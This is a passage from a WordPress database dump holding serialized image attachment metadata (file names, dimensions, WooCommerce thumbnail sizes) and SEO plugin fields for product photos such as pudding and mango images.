ype\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"252-2529007_pudding-jelly-hd-png-download-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"252-2529007_pudding-jelly-hd-png-download-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2934,745,'_elementor_version','3.5.5'),(2935,828,'_wp_attached_file','2022/02/252-2529007_pudding-jelly-hd-png-download-1.png'),(2936,828,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:860;s:6:\"height\";i:489;s:4:\"file\";s:55:\"2022/02/252-2529007_pudding-jelly-hd-png-download-1.png\";s:8:\"filesize\";i:480641;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88301;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10439;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-1-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2111;}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-768x437.png\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-600x341.png\";s:5:\"width\";i:600;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-1-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-1-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2972,787,'_aioseo_title',NULL),(2973,787,'_aioseo_description',NULL),(2974,787,'_aioseo_keywords',''),(2975,787,'_aioseo_og_title',NULL),(2976,787,'_aioseo_og_description',NULL),(2977,787,'_aioseo_og_article_section',''),(2978,787,'_aioseo_og_article_tags',''),(2979,787,'_aioseo_twitter_title',NULL),(2980,787,'_aioseo_twitter_description',NULL),(2987,857,'_wp_attached_file','2022/02/IMG_5808-Copy.jpg'),(2988,857,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1088;s:6:\"height\";i:1600;s:4:\"file\";s:25:\"2022/02/IMG_5808-Copy.jpg\";s:8:\"filesize\";i:279133;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"IMG_5808-Copy-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24326;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"IMG_5808-Copy-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4400;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"IMG_5808-Copy-50x74.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:74;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2188;}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-204x300.jpg\";s:5:\"width\";i:204;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"IMG_5808-Copy-696x1024.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"IMG_5808-Copy-768x1129.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1044x1536.jpg\";s:5:\"width\";i:1044;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-600x882.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:882;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"IMG_5808-Copy-48x71.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"IMG_5808-Copy-48x71.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2989,859,'_wp_attached_file','2022/02/IMG_5808-Copy-1.jpg'),(2990,859,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1088;s:6:\"height\";i:1600;s:4:\"file\";s:27:\"2022/02/IMG_5808-Copy-1.jpg\";s:8:\"filesize\";i:279133;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24326;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4400;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"IMG_5808-Copy-1-50x74.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:74;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2188;}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-204x300.jpg\";s:5:\"width\";i:204;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"IMG_5808-Copy-1-696x1024.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"IMG_5808-Copy-1-768x1129.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"IMG_5808-Copy-1-1044x1536.jpg\";s:5:\"width\";i:1044;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-600x882.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:882;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"IMG_5808-Copy-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-1-48x71.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:25:\"IMG_5808-Copy-1-48x71.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:71;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2991,860,'_wp_attached_file','2022/02/IMG_5808-Copy-1-edited.jpg'),(2992,860,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1088;s:6:\"height\";i:680;s:4:\"file\";s:34:\"2022/02/IMG_5808-Copy-1-edited.jpg\";s:8:\"filesize\";i:132181;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27258;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4736;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:32:\"IMG_5808-Copy-1-edited-50x31.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1496;}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"IMG_5808-Copy-1-edited-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-600x375.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"IMG_5808-Copy-1-edited-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:32:\"IMG_5808-Copy-1-edited-48x30.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:32:\"IMG_5808-Copy-1-edited-48x30.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:6:\"Picasa\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2993,861,'_wp_attached_file','2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg'),(2994,861,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:49:\"2022/02/Mango-Rasayana_finalforweb3-500x500-1.jpg\";s:8:\"filesize\";i:29336;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13721;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2781;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1188;}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2995,864,'_wp_attached_file','2022/02/mangoseehikarne2.jpg'),(2996,864,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1066;s:4:\"file\";s:28:\"2022/02/mangoseehikarne2.jpg\";s:8:\"filesize\";i:171820;s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"mangoseehikarne2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18037;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"mangoseehikarne2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6408;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"mangoseehikarne2-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4538;}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"mangoseehikarne2-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"mangoseehikarne2-1536x1023.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1023;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"mangoseehikarne2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:26:\"mangoseehikarne2-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:26:\"mangoseehikarne2-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2997,865,'_wp_attached_file','2022/02/download.jfif'),(2998,865,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:21:\"2022/02/download.jfif\";s:8:\"filesize\";i:6113;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"download-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2619;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"download-50x50.jfif\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1157;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"download-150x150.jfif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"download-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"download-48x48.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"download-48x48.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2999,867,'_wp_attached_file','2022/02/download-1.jfif'),(3000,867,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:194;s:6:\"height\";i:259;s:4:\"file\";s:23:\"2022/02/download-1.jfif\";s:8:\"filesize\";i:8754;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"download-1-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3462;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"download-1-50x67.jfif\";s:5:\"width\";i:50;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1526;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"download-1-150x150.jfif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"download-1-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:21:\"download-1-48x64.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:21:\"download-1-48x64.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3001,869,'_wp_attached_file','2022/02/images.jfif'),(3002,869,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:318;s:6:\"height\";i:159;s:4:\"file\";s:19:\"2022/02/images.jfif\";s:8:\"filesize\";i:5364;s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"images-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2863;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"images-50x25.jfif\";s:5:\"width\";i:50;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:766;}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"images-300x150.jfif\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"images-150x150.jfif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"images-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"images-48x24.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"images-48x24.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:24;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3014,888,'_wp_attached_file','2022/02/252-2529007_pudding-jelly-hd-png-download-2.png'),(3015,888,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:860;s:6:\"height\";i:489;s:4:\"file\";s:55:\"2022/02/252-2529007_pudding-jelly-hd-png-download-2.png\";s:8:\"filesize\";i:480641;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:55:\"252-2529007_p